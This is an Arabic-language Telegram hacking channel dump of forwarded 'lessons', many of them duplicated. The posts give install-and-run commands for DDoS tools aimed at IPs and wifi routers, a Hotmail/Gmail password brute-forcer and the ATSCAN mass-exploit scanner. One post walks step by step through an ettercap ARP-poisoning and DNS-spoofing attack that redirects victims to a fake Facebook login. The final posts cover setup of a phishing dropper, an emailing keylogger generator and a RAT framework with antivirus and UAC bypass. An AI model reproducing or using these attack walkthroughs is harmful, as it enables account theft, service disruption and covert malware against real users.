Forwarded from Deleted Account
DDos Attack :
هجمات الحرمان من الخدمات أو هجوم حجب الخدمة(بالإنجليزية: Denial of Service Attacks) هي هجمات تتم عن طريق إغراق المواقع بارسال سيل من البيانات غير اللازمة بشكل كثيف مما يسبب بطء الخدمات أو زحاماً مرورياً بهذه المواقع ويسبب صعوبة وصول المستخدمين لها نظراً لهذا الاكتظاظ .
* هناك العديد من الادوات للقيام بهذا الهجوم ومن احدى الامثلة لدرسنا اليوم هى ادات ( hammer ) :
* طريقة التثبيت والتشغيل :
(1) Apt update & apt upgrade - apt install git
(2) apt-get install python2
(3) git clone https://github.com/cyweb/hammer.git
(4) cd hammer
(5) python hammer.py -s ip -p 80 _t 135
# انتهى الدرس
# اعداد المتدرب ( hamza )
#جزى الله خيرا صاحب القناة لترقيتنا الى التدريب العملى
هجمات الحرمان من الخدمات أو هجوم حجب الخدمة(بالإنجليزية: Denial of Service Attacks) هي هجمات تتم عن طريق إغراق المواقع بارسال سيل من البيانات غير اللازمة بشكل كثيف مما يسبب بطء الخدمات أو زحاماً مرورياً بهذه المواقع ويسبب صعوبة وصول المستخدمين لها نظراً لهذا الاكتظاظ .
* هناك العديد من الادوات للقيام بهذا الهجوم ومن احدى الامثلة لدرسنا اليوم هى ادات ( hammer ) :
* طريقة التثبيت والتشغيل :
(1) Apt update & apt upgrade - apt install git
(2) apt-get install python2
(3) git clone https://github.com/cyweb/hammer.git
(4) cd hammer
(5) python hammer.py -s ip -p 80 _t 135
# انتهى الدرس
# اعداد المتدرب ( hamza )
#جزى الله خيرا صاحب القناة لترقيتنا الى التدريب العملى
GitHub
GitHub - cyweb/hammer: Hammer DDos Script - Python 3
Hammer DDos Script - Python 3. Contribute to cyweb/hammer development by creating an account on GitHub.
Forwarded from ڪٱيت̲و ڪيدّ
sudo suapt-get install git
git clone https://github.com/LionSec/katoolin.git && cp katoolin/katoolin.py
/usr/bin/katoolin
chmod +x /usr/bin/katoolin
sudo katoolin
#كايتو_كيد
git clone https://github.com/LionSec/katoolin.git && cp katoolin/katoolin.py
/usr/bin/katoolin
chmod +x /usr/bin/katoolin
sudo katoolin
#كايتو_كيد
GitHub
GitHub - LionSec/katoolin: Automatically install all Kali linux tools
Automatically install all Kali linux tools. Contribute to LionSec/katoolin development by creating an account on GitHub.
Forwarded from ڪٱيت̲و ڪيدّ
Forwarded from Deleted Account
بسم الله الرحمن الرحيم
درس اليوم ( هجوم الحرمان من الخدمة DDos attack ) :
هجمات الحرمان من الخدمات أو هجوم حجب الخدمة(بالإنجليزية: Denial of Service Attacks) هي هجمات تتم عن طريق إغراق المواقع بارسال سيل من البيانات غير اللازمة بشكل كثيف مما يسبب بطء الخدمات أو زحاماً مرورياً بهذه المواقع ويسبب صعوبة وصول المستخدمين لها نظراً لهذا الاكتظاظ .
* هناك العديد من الادوات للقيام بهذا الهجوم ومن احدى الامثلة لدرسنا اليوم هى ادات ( LITEDDOS ) :
* طريقة التثبيت والتشغيل :
$ apt update
$ apt upgrade
$ pkg install git
KE-EMPAT
$ pkg install python2
$ git clone https://github.com/4L13199/LITEDDOS
$ cd LITEDDOS
$ python2 liteDDOS.py <ip> <port> 100
# انتهى الدرس
# اعداد المتدرب ( hamza )
#جزى الله خيرا صاحب القناة لترقيتنا الى التدريب العملى
درس اليوم ( هجوم الحرمان من الخدمة DDos attack ) :
هجمات الحرمان من الخدمات أو هجوم حجب الخدمة(بالإنجليزية: Denial of Service Attacks) هي هجمات تتم عن طريق إغراق المواقع بارسال سيل من البيانات غير اللازمة بشكل كثيف مما يسبب بطء الخدمات أو زحاماً مرورياً بهذه المواقع ويسبب صعوبة وصول المستخدمين لها نظراً لهذا الاكتظاظ .
* هناك العديد من الادوات للقيام بهذا الهجوم ومن احدى الامثلة لدرسنا اليوم هى ادات ( LITEDDOS ) :
* طريقة التثبيت والتشغيل :
$ apt update
$ apt upgrade
$ pkg install git
KE-EMPAT
$ pkg install python2
$ git clone https://github.com/4L13199/LITEDDOS
$ cd LITEDDOS
$ python2 liteDDOS.py <ip> <port> 100
# انتهى الدرس
# اعداد المتدرب ( hamza )
#جزى الله خيرا صاحب القناة لترقيتنا الى التدريب العملى
GitHub
GitHub - 4L13199/LITEDDOS: This Tool Is Supporting For DDOS Activities, The Way Is Typing Command : $ python2 islddos.py <ip>…
This Tool Is Supporting For DDOS Activities, The Way Is Typing Command : $ python2 islddos.py <ip> <port> <packet> example: $python2 islddos.py 104.27....
Forwarded from DEYAA ..𓂆
شرح أداة Hotmail BruteForce ..🔥
هاي الاداة رح نستخدمها من خلال اداة multitools اللي فيها ادوات تانية غير اداة
Hotmail BruteForce
وخطوات تنزيلها للتيرمكس طبعا
كالتالي ..👇👇👇
نثبت اداة multitools من موقع github
git clone https://github.com/sp1dermanhackeryoutube/multitools.git
cd multitools
cd Multitools
((ملاحظة)) 👈 لاحظوا الامرين الاخيرين متشابهين فقط حرف M بختلف ..
chmod +x install.sh
chmod +x multitools.py
-----
((فائدة)) 👈 الامرين chmod بنقدر نستبدلهم بأمر واحد بدل م نعمل كل واحد على حدى بهاد الامر اللي بخلي كل الملفات باللون الاخضر وتقدر تشغلها على البايثون ..
chmod +x *
------
الان ندخل التالي
./install.sh
واخر خطوة لنفوت عالاداة وهي باستخدام python3
python3 multitools.py
بتضغط Enter مرتين
الان الاداة تثبتت رح نفوت منها على الأداة رقم 2
[2] Hotmail BruteForce
نختار الخيار الاول للتخمين ..
رح يطلب منك مسار ملف التخمين اللي رح يستخدمو .
تاني شي بيطلب الايميل
ورح يبدأ الهجوم متل م هوا مبين بالصور .
((ملاحظة صغيرة))
اذا ما عندك ملف كلمات سر ممكن تنشئه عن طريق الأداة
من الخيار رقم 3 بعد م تفوت على الأداة من الامر
python3 multitools.py
نختار
[3] Wordlist Generator
منها رح يطلب منك شوية معلومات ع اساسها رح يعمل ملف تخمين تقدر تستخدمو للهجوم على الايميل اللي بدك ياا .
الاداة ممكن تستخدمها لل Gmail أيضاا ..❤
.....
بتمنى يكون الشرح كآفي ووآفي
أخوكم // #Deyaa.R
هاي الاداة رح نستخدمها من خلال اداة multitools اللي فيها ادوات تانية غير اداة
Hotmail BruteForce
وخطوات تنزيلها للتيرمكس طبعا
كالتالي ..👇👇👇
نثبت اداة multitools من موقع github
git clone https://github.com/sp1dermanhackeryoutube/multitools.git
cd multitools
cd Multitools
((ملاحظة)) 👈 لاحظوا الامرين الاخيرين متشابهين فقط حرف M بختلف ..
chmod +x install.sh
chmod +x multitools.py
-----
((فائدة)) 👈 الامرين chmod بنقدر نستبدلهم بأمر واحد بدل م نعمل كل واحد على حدى بهاد الامر اللي بخلي كل الملفات باللون الاخضر وتقدر تشغلها على البايثون ..
chmod +x *
------
الان ندخل التالي
./install.sh
واخر خطوة لنفوت عالاداة وهي باستخدام python3
python3 multitools.py
بتضغط Enter مرتين
الان الاداة تثبتت رح نفوت منها على الأداة رقم 2
[2] Hotmail BruteForce
نختار الخيار الاول للتخمين ..
رح يطلب منك مسار ملف التخمين اللي رح يستخدمو .
تاني شي بيطلب الايميل
ورح يبدأ الهجوم متل م هوا مبين بالصور .
((ملاحظة صغيرة))
اذا ما عندك ملف كلمات سر ممكن تنشئه عن طريق الأداة
من الخيار رقم 3 بعد م تفوت على الأداة من الامر
python3 multitools.py
نختار
[3] Wordlist Generator
منها رح يطلب منك شوية معلومات ع اساسها رح يعمل ملف تخمين تقدر تستخدمو للهجوم على الايميل اللي بدك ياا .
الاداة ممكن تستخدمها لل Gmail أيضاا ..❤
.....
بتمنى يكون الشرح كآفي ووآفي
أخوكم // #Deyaa.R
GitHub
GitHub - AnonymousSp1dy/multitools: This is a multihack with Gmail bruteforce, Hotmail Bruteforce and a password generator.
This is a multihack with Gmail bruteforce, Hotmail Bruteforce and a password generator. - AnonymousSp1dy/multitools
Forwarded from ▂▃▄▅▆▇█▓▒░فّخِأُمِﮭ -┆💙♕░▒▓█▇▆▅▄▃▂
*الـ💔ــّωــ✋ـَّلاρٓ ؏ٓـلْيگــــρ*
شرحنا اليوم عن سكربت ATSCAN لبحث عن دوركات والبحث عن مواقع مصابة بثغرات - ATSCAN tool for scan DORKS
ATSCAN Advanced Search / Dork / Mass Exploitation Scanner
Install..
$ pkg install git perl
$ git clone https://github.com/AlisamTechnology/ATSCAN
$ cpan install URI::Escape
$ cpan install HTML::Entities
$ perl atscan.pl -h
Sory friends I m use this video
$ cpan install HTTP::Entities this is wrong
★ Description
● عمليات مسح فورية متعددة.
● الاستغلال الشامل
● استخدام الوكيل.
● وكيل مستخدم عشوائي.
● محرك عشوائي.
● أوامر التنفيذ الشامل الشامل.
● يستغل وقضايا البحث.
● XSS / SQLI / LFI / AFD الماسح الضوئي.
● تصفية مواقع وورد و جملة.
● وورد موضوع والكشف عن البرنامج المساعد.
● البحث عن صفحة المسؤول.
● فك شفرة / تشفير Base64 / MD5
● مسح المنافذ.
● اجمع عناوين IP
● اجمع رسائل البريد الإلكتروني.
● الكشف التلقائي عن الأخطاء.
● الكشف التلقائي عن النماذج.
● الكشف التلقائي سم.
● نشر البيانات.
● مكرر تسلسل تلقائي.
● التحقق من الصحة.
● نشر والحصول على طريقة
● توطين IP
● قضايا واستغلال البحث
● واجهة تفاعلية وعادية.
● والمزيد ...
***********************
Pls like subscribes my channel
***********************
THIS VIDEO IS ONLY FOR EDUCATIONAL PURPOSE DON`T Missus s THIS TUTORIAL....
***********************
Thanks for watching
yours.
Arif-Tech
ariftech
شرحنا اليوم عن سكربت ATSCAN لبحث عن دوركات والبحث عن مواقع مصابة بثغرات - ATSCAN tool for scan DORKS
ATSCAN Advanced Search / Dork / Mass Exploitation Scanner
Install..
$ pkg install git perl
$ git clone https://github.com/AlisamTechnology/ATSCAN
$ cpan install URI::Escape
$ cpan install HTML::Entities
$ perl atscan.pl -h
Sory friends I m use this video
$ cpan install HTTP::Entities this is wrong
★ Description
● عمليات مسح فورية متعددة.
● الاستغلال الشامل
● استخدام الوكيل.
● وكيل مستخدم عشوائي.
● محرك عشوائي.
● أوامر التنفيذ الشامل الشامل.
● يستغل وقضايا البحث.
● XSS / SQLI / LFI / AFD الماسح الضوئي.
● تصفية مواقع وورد و جملة.
● وورد موضوع والكشف عن البرنامج المساعد.
● البحث عن صفحة المسؤول.
● فك شفرة / تشفير Base64 / MD5
● مسح المنافذ.
● اجمع عناوين IP
● اجمع رسائل البريد الإلكتروني.
● الكشف التلقائي عن الأخطاء.
● الكشف التلقائي عن النماذج.
● الكشف التلقائي سم.
● نشر البيانات.
● مكرر تسلسل تلقائي.
● التحقق من الصحة.
● نشر والحصول على طريقة
● توطين IP
● قضايا واستغلال البحث
● واجهة تفاعلية وعادية.
● والمزيد ...
***********************
Pls like subscribes my channel
***********************
THIS VIDEO IS ONLY FOR EDUCATIONAL PURPOSE DON`T Missus s THIS TUTORIAL....
***********************
Thanks for watching
yours.
Arif-Tech
ariftech
GitHub
GitHub - AlisamTechnology/ATSCAN: Advanced dork Search & Mass Exploit Scanner
Advanced dork Search & Mass Exploit Scanner. Contribute to AlisamTechnology/ATSCAN development by creating an account on GitHub.
Forwarded from Danial Silva
اليوم سوف أقوم بشرح عن أداة تحليل البروتوكولات وكيف يتم تحليلها واستغلالها
بدايةً سوف نتكلم عن البروتوكول وهو...
هو بروتوكول الاتصال الأساسي في حزمة بروتوكولات الإنترنت ويُشكّل الأساس الذي تعتمد عليه عمليّة توجيه الرزم (Routing) ضمن الشبكة، ويسمح ذلك بالاتصال بين الشبكات المُختلفة، وهذا هو جوهر شبكة الإنترنت.
اي أنهُ بإختصار مثل الوسيط بينك وبين الشبكة حتى تستطيع الحصول على ما تُريد وهُناك العديد من البروتوكولات ولكل بروتوكول مهمة خاصّة به....
لنبدأ الشرح...
#Tools :
+ Wireshark
+ Bettercap
#Steps :
1- سوف نقوم بتشغيل أداة تحليل البروتوكولات وهكذا سوف يكون تم إجتياز أول شئ من الشرح....
# لتشغيل الأداة يوجد طريقتين....
- كتابة wireshark داخل التيرمنال
- نذهب إلى
Application => => wireshark
# سوف تظهر لنا واجهة بها إختيار interface الخاص بنا يمكنك إختيار eth0 أو wlan0 حسب الذي تعمل به
# سوف تظهر لنا نافذة الأداة ومن هُنا نبدأ في تحليل البروتوكولات.....
لنتابع معاً....
2- بعد أن تظهر لنا نافذة الأداة سيظهر لنا العديد من الأشياء ولكن بالطبع لن نفهم شئ لذا لنفهم مع بعض كِل شئ...
سوف أترك صورة توّضح ما أتكلم عنه في الأسفل وسوف تجدوا أرقام وهي التي توّضح ما أتكلم عنه هُنا....
#1- ستجد كلمة مخفية مثل هذه....
Apply a display filter __ <Ctrl-/>
وهي تعني فلترة الأشياء التي تظهر لك وهي مثل موجه الأوامر الخاص بالأداة وسنفهم هذا لاحقاً....
#2- شريط المهام وبه كُلاً من....
No. Time
وهي تعني برقم العملية وبجانبه الوقت وتظهر لك بالشكل التالي...
1 0.000000000
2 0.157298626
Source
وهي تعني بالمصدر الذي يأتي منهُ المعلومات والمقصود بها الأي بي الداخلي ويكون مثل هذا....
192.168.1.4
Destination
ستجد العديد من الأيبيات ولكن ستجد أيضاً الأي بي الذي قام بالإتصال عبرهُ...
Protocol
وهذه تعني البروتوكول المُستخدم وستجد العديد من البروتوكولات مثل....
DNS
UDP
TCP
info
وهذه تعني إتصل بماذا؟....
فمثلاً إذا كان البروتوكول الذي قُمنا باستغلاله هو DNS ستجد بعض الأشياء وبالنهاية إسم الموقع أو DNS الخاص بالشئ الذي إتصل به....
حسناً لنرى ما يُمكننا فعله....
سنقوم بفلترة الأشياء عبر الذي شرحته أول شئ الذي يُسمى filter...
سنقوم بوضع الشئ الذي نقوم بتحليل مثل البروتوكول وسوف نستخدم بروتوكول DNS ونقوم بتحليله لنرى كيف ذلك....
نكتب بالفراغ هذا فقط ثلاثة أحرف وهما...
# dns
وعندما يتصل أي أحد داخل الشبكة بأي شئ عبر هذا البروتوكول ستجد الأي بي الخاص به بالأهداف التي قام بزيارتها وكُل شئ وهكذا قد إنتهينا من تحليل البروتوكولات ويمكنك إضافة أي بروتوكول تُريده بدل dns ويمكنك إضافة أي بي مُعين أيضاً عبر كتابة الأمر التالي...
# ip.addr == الأي بي الذي تُريده
وإذا أردت تحليل بروتوكول مُعين نكتب التالي....
# ip.addr == الأي بي الذي تُريده && dns
أو يُمكنك إختيار البروتوكول الذي تُريده...
3- نأتي لكيفية الإستغلال وهُنا سوف نستخدم أداة ettercap....
# لتشغيل الأداة يوجد طريقتين أيضاً
ولكن سوف نستخدم الطريقة الأتية...
# Application => Sniff & Spoof => ettercap-gui
ولكن قبل هذا يجب علينا تعديل بعض الأشياء حتى تعمل معنا الأداة جيداً....
نكتب الأمر التالي داخل التيرمنال...
# gedit /etc/ettercap/etter.conf
ستجد كلمتي
ec_uid ==> x
ec_gid ==> x
وهذا الحرف يعني رقم عليك بتغييرها إلى رقم 0 هكذا....
ec_uid ==> 0
ec_gid ==> 0
وقُم بالبحث قليلاً عن كلمة root ستجد الأتي....
#---------------
# Linux
#---------------
# ,,,,,,,, iptables
وستجد الكلمات التالية
#redir_command_on
#redir_command_off
قُم بحذف علامة الهاش هكذا....
redir_command_on
redir_command_off
نقوم بالتعديل على ملف dns حتى نقوم بعمل إعادة توجيه للرابط الذي نُريده...
سوف أُكمل وكأننا سوف نقوم بإستغلال dns
لإعادة التوجيه لرابط خبيث به تسجيل دخول إلى فيسبوك ولكي نفعل هذا سنقوم بعمل إضافة dns
الخاص بموقع فيسبوك داخل الملف وبجانبه سنضع أي بي الرابط الخاص بنا...
نكتب التالي بالتيرمنال...
# gedit /etc/ettercap/etter.dns
سنجد كلمة microsoft sucks
وبعدها روابط مثل...
microsoft.com
*.microsoft.com
www.microsoft.com
نقوم بتغيير microsoft
إلى الرابط الذي نُريد عمل تجسس عليه
وبجانبه سنجد أي بي سنقوم بتغييرها إلى أي بي أو هوست الرابط....
الأن سنبدأ الإستغلال...
# بعد تشغيل الأداة نختار
# Sniff
نختار
Unfied sniffing
# Hosts
نختار
scan for hosts
# Hosts
نختار منها Hosts list
ليظهر لنا الأهداف
وبعد أن نختار الهدف نقوم بتحديده
Add to Target 2
ونقوم بتحديد أي بي الراوتر
Add to Target 1
# Target
نختار
Current Targets
# Mitm
نختار
Arp Poisoning
ونختار
بدايةً سوف نتكلم عن البروتوكول وهو...
هو بروتوكول الاتصال الأساسي في حزمة بروتوكولات الإنترنت ويُشكّل الأساس الذي تعتمد عليه عمليّة توجيه الرزم (Routing) ضمن الشبكة، ويسمح ذلك بالاتصال بين الشبكات المُختلفة، وهذا هو جوهر شبكة الإنترنت.
اي أنهُ بإختصار مثل الوسيط بينك وبين الشبكة حتى تستطيع الحصول على ما تُريد وهُناك العديد من البروتوكولات ولكل بروتوكول مهمة خاصّة به....
لنبدأ الشرح...
#Tools :
+ Wireshark
+ Bettercap
#Steps :
1- سوف نقوم بتشغيل أداة تحليل البروتوكولات وهكذا سوف يكون تم إجتياز أول شئ من الشرح....
# لتشغيل الأداة يوجد طريقتين....
- كتابة wireshark داخل التيرمنال
- نذهب إلى
Application => => wireshark
# سوف تظهر لنا واجهة بها إختيار interface الخاص بنا يمكنك إختيار eth0 أو wlan0 حسب الذي تعمل به
# سوف تظهر لنا نافذة الأداة ومن هُنا نبدأ في تحليل البروتوكولات.....
لنتابع معاً....
2- بعد أن تظهر لنا نافذة الأداة سيظهر لنا العديد من الأشياء ولكن بالطبع لن نفهم شئ لذا لنفهم مع بعض كِل شئ...
سوف أترك صورة توّضح ما أتكلم عنه في الأسفل وسوف تجدوا أرقام وهي التي توّضح ما أتكلم عنه هُنا....
#1- ستجد كلمة مخفية مثل هذه....
Apply a display filter __ <Ctrl-/>
وهي تعني فلترة الأشياء التي تظهر لك وهي مثل موجه الأوامر الخاص بالأداة وسنفهم هذا لاحقاً....
#2- شريط المهام وبه كُلاً من....
No. Time
وهي تعني برقم العملية وبجانبه الوقت وتظهر لك بالشكل التالي...
1 0.000000000
2 0.157298626
Source
وهي تعني بالمصدر الذي يأتي منهُ المعلومات والمقصود بها الأي بي الداخلي ويكون مثل هذا....
192.168.1.4
Destination
ستجد العديد من الأيبيات ولكن ستجد أيضاً الأي بي الذي قام بالإتصال عبرهُ...
Protocol
وهذه تعني البروتوكول المُستخدم وستجد العديد من البروتوكولات مثل....
DNS
UDP
TCP
info
وهذه تعني إتصل بماذا؟....
فمثلاً إذا كان البروتوكول الذي قُمنا باستغلاله هو DNS ستجد بعض الأشياء وبالنهاية إسم الموقع أو DNS الخاص بالشئ الذي إتصل به....
حسناً لنرى ما يُمكننا فعله....
سنقوم بفلترة الأشياء عبر الذي شرحته أول شئ الذي يُسمى filter...
سنقوم بوضع الشئ الذي نقوم بتحليل مثل البروتوكول وسوف نستخدم بروتوكول DNS ونقوم بتحليله لنرى كيف ذلك....
نكتب بالفراغ هذا فقط ثلاثة أحرف وهما...
# dns
وعندما يتصل أي أحد داخل الشبكة بأي شئ عبر هذا البروتوكول ستجد الأي بي الخاص به بالأهداف التي قام بزيارتها وكُل شئ وهكذا قد إنتهينا من تحليل البروتوكولات ويمكنك إضافة أي بروتوكول تُريده بدل dns ويمكنك إضافة أي بي مُعين أيضاً عبر كتابة الأمر التالي...
# ip.addr == الأي بي الذي تُريده
وإذا أردت تحليل بروتوكول مُعين نكتب التالي....
# ip.addr == الأي بي الذي تُريده && dns
أو يُمكنك إختيار البروتوكول الذي تُريده...
3- نأتي لكيفية الإستغلال وهُنا سوف نستخدم أداة ettercap....
# لتشغيل الأداة يوجد طريقتين أيضاً
ولكن سوف نستخدم الطريقة الأتية...
# Application => Sniff & Spoof => ettercap-gui
ولكن قبل هذا يجب علينا تعديل بعض الأشياء حتى تعمل معنا الأداة جيداً....
نكتب الأمر التالي داخل التيرمنال...
# gedit /etc/ettercap/etter.conf
ستجد كلمتي
ec_uid ==> x
ec_gid ==> x
وهذا الحرف يعني رقم عليك بتغييرها إلى رقم 0 هكذا....
ec_uid ==> 0
ec_gid ==> 0
وقُم بالبحث قليلاً عن كلمة root ستجد الأتي....
#---------------
# Linux
#---------------
# ,,,,,,,, iptables
وستجد الكلمات التالية
#redir_command_on
#redir_command_off
قُم بحذف علامة الهاش هكذا....
redir_command_on
redir_command_off
نقوم بالتعديل على ملف dns حتى نقوم بعمل إعادة توجيه للرابط الذي نُريده...
سوف أُكمل وكأننا سوف نقوم بإستغلال dns
لإعادة التوجيه لرابط خبيث به تسجيل دخول إلى فيسبوك ولكي نفعل هذا سنقوم بعمل إضافة dns
الخاص بموقع فيسبوك داخل الملف وبجانبه سنضع أي بي الرابط الخاص بنا...
نكتب التالي بالتيرمنال...
# gedit /etc/ettercap/etter.dns
سنجد كلمة microsoft sucks
وبعدها روابط مثل...
microsoft.com
*.microsoft.com
www.microsoft.com
نقوم بتغيير microsoft
إلى الرابط الذي نُريد عمل تجسس عليه
وبجانبه سنجد أي بي سنقوم بتغييرها إلى أي بي أو هوست الرابط....
الأن سنبدأ الإستغلال...
# بعد تشغيل الأداة نختار
# Sniff
نختار
Unfied sniffing
# Hosts
نختار
scan for hosts
# Hosts
نختار منها Hosts list
ليظهر لنا الأهداف
وبعد أن نختار الهدف نقوم بتحديده
Add to Target 2
ونقوم بتحديد أي بي الراوتر
Add to Target 1
# Target
نختار
Current Targets
# Mitm
نختار
Arp Poisoning
ونختار
Forwarded from Danial Silva
بعدها
✔️ Sniff remote connections.
# Plugins
ونختار
dns_spoof
# Sniff
نختار
Start Sniffing
وعندما يتم دخول الضحية إلى موقع فيسبوك سيجد صفحة تسجيل الدخول خاصّتك وهُنا ينتهي الشرح وهذا شئ بسيط بالنسبة لإستغلال مثل هذه البروتوكولات فيُمكنك فعل كُل شئ تُريده
وإن كان هُناك توفيق فمن الله وإذا كان خطأ فمني ومن الشيطان...
# هذا الشرح إهداء إلى كُل من ...
#CS_Princess
#VenomX_Team
# ومُقدم من....
#CS_Princess
#CrTVenom
✔️ Sniff remote connections.
# Plugins
ونختار
dns_spoof
# Sniff
نختار
Start Sniffing
وعندما يتم دخول الضحية إلى موقع فيسبوك سيجد صفحة تسجيل الدخول خاصّتك وهُنا ينتهي الشرح وهذا شئ بسيط بالنسبة لإستغلال مثل هذه البروتوكولات فيُمكنك فعل كُل شئ تُريده
وإن كان هُناك توفيق فمن الله وإذا كان خطأ فمني ومن الشيطان...
# هذا الشرح إهداء إلى كُل من ...
#CS_Princess
#VenomX_Team
# ومُقدم من....
#CS_Princess
#CrTVenom
Forwarded from Deleted Account
السلام عليكم
موضوعنا هو. الهجوم على شبكات الوايفاي
باداه قويه ومجربه
https://github.com/4L13199/LITEDDOS
cd LITEDDOS
لكي نشغلها
الامر.
python2 LITEDDOS.py (ip router)80 (عدد الهجمات)
DARK MAN-----CH
موضوعنا هو. الهجوم على شبكات الوايفاي
باداه قويه ومجربه
https://github.com/4L13199/LITEDDOS
cd LITEDDOS
لكي نشغلها
الامر.
python2 LITEDDOS.py (ip router)80 (عدد الهجمات)
DARK MAN-----CH
GitHub
GitHub - 4L13199/LITEDDOS: This Tool Is Supporting For DDOS Activities, The Way Is Typing Command : $ python2 islddos.py <ip>…
This Tool Is Supporting For DDOS Activities, The Way Is Typing Command : $ python2 islddos.py <ip> <port> <packet> example: $python2 islddos.py 104.27....
ماذا تريدون شرح اليوم
anonymous poll
ادوات termux – 54
👍👍👍👍👍👍👍 73%
التكلم عن الفيروسات و انواعها – 20
👍👍👍 27%
👥 74 people voted so far.
anonymous poll
ادوات termux – 54
👍👍👍👍👍👍👍 73%
التكلم عن الفيروسات و انواعها – 20
👍👍👍 27%
👥 74 people voted so far.
قناة تهتم بكل ما يخص شبكات التواصل الاجتماعي متاحات فيس بوك انستغرام ارقام وهمية شروحات وفحوصات برامج ثغرات اعدادات برامج إنترنت مجاني كل ما يخص سوريا سوف تجده هنا
@freenetsyria
@freenetsyria
انترنت مجاني لجميع انحاء العالم
..دورات تعليم صيانة الموبايل بشكل يومي
تطبيقات مهمة .
سيرتات مجانية
انترنت اورنج فرنسا
اتصالات المغرب
خطوط سلكوم واورنج فلسطين
فودفون اليونان
فودفو tr
اورنج مصر
الفلبين
المانيا
السعودية
@freenet4evr
..دورات تعليم صيانة الموبايل بشكل يومي
تطبيقات مهمة .
سيرتات مجانية
انترنت اورنج فرنسا
اتصالات المغرب
خطوط سلكوم واورنج فلسطين
فودفون اليونان
فودفو tr
اورنج مصر
الفلبين
المانيا
السعودية
@freenet4evr
Termux CS via @vote
ماذا تريدون شرح اليوم anonymous poll ادوات termux – 54 👍👍👍👍👍👍👍 73% التكلم عن الفيروسات و انواعها – 20 👍👍👍 27% 👥 74 people voted so far.
بكفي هل القد من التصويت
بنزل شروحات عن ادوات termux
بنزل شروحات عن ادوات termux
1- اداه Umbrella
git clone https://github.com/4w4k3/Umbrella.git
cd Umbrella
sudo su
chmod +x install.sh
./install.sh
python umbrella.py
مميزات الاداه
Download executable on target system.
Silent execution.
Download and execute executable once time.
If the exe already had downloaded and running, open only pdf/docx/xxls/jpg/png.
Some Phishing methods are included.
Multiple Session disabled.
Bypass UAC.
#CS
git clone https://github.com/4w4k3/Umbrella.git
cd Umbrella
sudo su
chmod +x install.sh
./install.sh
python umbrella.py
مميزات الاداه
Download executable on target system.
Silent execution.
Download and execute executable once time.
If the exe already had downloaded and running, open only pdf/docx/xxls/jpg/png.
Some Phishing methods are included.
Multiple Session disabled.
Bypass UAC.
#CS
GitHub
GitHub - 4w4k3/Umbrella: A Phishing Dropper designed to Pentest.
A Phishing Dropper designed to Pentest. Contribute to 4w4k3/Umbrella development by creating an account on GitHub.
2- اداه BeeLogger
اوامر تثبيتها
git clone https://github.com/4w4k3/BeeLogger.git
cd BeeLogger
sudo su
chmod +x install.sh
./install.sh
python bee.py
مميزات الاداه
Send logs each 120 seconds.
Send logs when chars > 50.
Send logs with GMAIL.
Some Phishing methods are included.
Multiple Session disabled.
Auto Persistence.
#CS
اوامر تثبيتها
git clone https://github.com/4w4k3/BeeLogger.git
cd BeeLogger
sudo su
chmod +x install.sh
./install.sh
python bee.py
مميزات الاداه
Send logs each 120 seconds.
Send logs when chars > 50.
Send logs with GMAIL.
Some Phishing methods are included.
Multiple Session disabled.
Auto Persistence.
#CS
GitHub
GitHub - 4w4k3/BeeLogger: Generate Gmail Emailing Keyloggers to Windows.
Generate Gmail Emailing Keyloggers to Windows. Contribute to 4w4k3/BeeLogger development by creating an account on GitHub.
3- اداه Insanity-Framework
اوامر تثبيتها
git clone https://github.com/4w4k3/Insanity-Framework
cd Insanity-Framework
chmod +x install.sh
./install.sh
مميزات الاداه
Bypass most AV and Sandboxes.
Remote Control.
Payload Generation.
Some Phishing methods are included on payloads generated.
Detect Virtual Machines.
Multiple Session disabled.
Persistence and others features can be enabled.
Bypass UAC.
Memory Injection.
#CS
اوامر تثبيتها
git clone https://github.com/4w4k3/Insanity-Framework
cd Insanity-Framework
chmod +x install.sh
./install.sh
مميزات الاداه
Bypass most AV and Sandboxes.
Remote Control.
Payload Generation.
Some Phishing methods are included on payloads generated.
Detect Virtual Machines.
Multiple Session disabled.
Persistence and others features can be enabled.
Bypass UAC.
Memory Injection.
#CS
GitHub
GitHub - 4w4k3/Insanity-Framework: Generate Payloads and Control Remote Machines. [Discontinued]
Generate Payloads and Control Remote Machines. [Discontinued] - 4w4k3/Insanity-Framework